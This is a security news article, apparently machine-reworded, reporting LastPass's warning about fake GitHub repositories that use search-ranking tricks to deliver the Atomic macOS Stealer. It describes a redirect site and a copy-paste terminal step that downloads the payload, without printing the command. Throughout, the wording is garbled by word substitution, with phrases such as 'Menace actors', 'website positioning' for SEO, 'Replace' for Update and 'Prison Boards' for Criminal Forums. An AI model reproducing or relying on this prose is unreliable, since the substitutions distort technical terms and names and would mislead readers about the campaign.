Menace actors are impersonating identified manufacturers in an ongoing, widespread marketing campaign aimed toward infecting macOS customers with info stealer malware, LastPass warns.
As a part of the an infection chain, the hackers are counting on fraudulent GitHub repositories claiming to supply macOS software program from varied firms and use search engine marketing (website positioning) in order that hyperlinks to the repositories seem on the high of search pages.
“Within the case of LastPass, the fraudulent repositories redirected potential victims to a repository that downloads the Atomic infostealer malware,” LastPass says.
LastPass recognized two GitHub websites impersonating its model, which have been posted on the Microsoft-owned code-sharing platform on 16 September, and which have been taken down since.
Each have been posted by a consumer named ‘modhopmduck476’ and contained hyperlinks claiming to allow customers to put in ‘LastPass on MacBook’, however redirected to the identical malicious web page.
A web page claiming to supply ‘LastPass Premium on MacBook’ was redirecting to macprograms-pro[.]com, the place customers have been instructed to repeat and paste a command right into a terminal window.
The command initiates a CURL request to an encoded URL, leading to an ‘Replace’ payload being downloaded to the Temp listing.
The payload was the Atomic macOS Stealer (AMOS) infostealer, which has been utilized in quite a few assaults since 2023. In August, CrowdStrike warned of a rise in fraudulent ads delivering a variant of AMOS known as SHAMOS.Commercial. Scroll to proceed studying.
LastPass has noticed the risk actors impersonating monetary establishments, password managers, know-how firms, AI instruments, cryptocurrency wallets, and different companies.
To evade detection, the risk actors used a number of GitHub usernames to create different pretend GitHub pages, which adopted an analogous naming sample, the place the identify of the focused firm and Mac-related terminology have been used.
The marketing campaign noticed by LastPass has been ongoing since at the very least July, when Deriv safety researcher Dhiraj Mishra warned that Homebrew customers have been focused with malicious advertisements resulting in a pretend GitHub repository.
The assaults, Mishra identified, exploited customers’ belief in Google Adverts and GitHub, and put in the official Homebrew software to cover the execution of a malicious payload within the background.
Associated: Telegram Rivaling Tor as House to Prison ‘Boards’
Associated: Apple, Netflix, Microsoft Websites ‘Hacked’ for Tech Assist Scams
Associated: Apple Rolls Out iOS 26, macOS Tahoe 26 With Patches for Over 50 Vulnerabilities
Associated: Apple Sends Contemporary Wave of Spy ware Notifications to French Customers
